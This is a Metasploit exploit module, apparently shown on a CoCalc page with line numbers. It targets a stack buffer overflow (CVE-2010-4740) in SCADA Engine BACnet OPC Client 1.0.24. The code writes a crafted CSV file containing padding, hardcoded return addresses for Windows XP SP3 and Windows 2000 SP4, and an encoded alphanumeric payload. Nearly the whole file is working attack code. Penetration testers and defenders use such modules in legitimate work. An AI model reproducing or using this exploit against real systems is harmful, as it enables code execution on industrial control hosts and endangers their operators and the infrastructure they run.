CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'BACnet OPC Client Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in SCADA
16
        Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client
17
        parses a specially crafted csv file, arbitrary code may be
18
        executed.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         => [ 'Jeremy Brown', 'MC' ],
22
      'References'     =>
23
        [
24
          [ 'CVE', '2010-4740' ],
25
          [ 'OSVDB', '68096'],
26
          [ 'BID', '43289' ],
27
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01' ],
28
        ],
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'process',
32
        },
33
      'Payload'        =>
34
        {
35
          'MinNops'  => 0,
36
          'MaxNops'  => 0,
37
          'Space'    => 698,
38
          'BadChars' =>  Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
39
          'StackAdjustment' => -3500,
40
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
41
          'EncoderOptions' =>
42
            {
43
              'BufferRegister' => 'ECX',
44
            },
45
        },
46
      'Platform' => 'win',
47
      'Targets'        =>
48
        [
49
          [ 'Windows XP SP3 English',   { 'Ret' => 0x77e26323 } ],
50
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
51
        ],
52
      'Privileged'     => false,
53
      'DisclosureDate' => '2010-09-16',
54
      'DefaultTarget'  => 0))
55

56
    register_options(
57
      [
58
        OptString.new( 'FILENAME',  [ false, 'The file name.',  'msf.csv' ]),
59
      ])
60

61
  end
62

63
  def exploit
64

65
    csv = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\"
66
    csv << rand_text_alpha_upper(185)
67
    csv << [target.ret].pack('V') + rand_text_alpha_upper(4)
68
    csv << payload.encoded + rand_text_alpha_upper(750 - payload.encoded.length)
69
    csv << "\\scada,0,0,\n"
70

71
    print_status("Creating '#{datastore['FILENAME']}' file ...")
72

73
    file_create(csv)
74

75
  end
76
end
77

78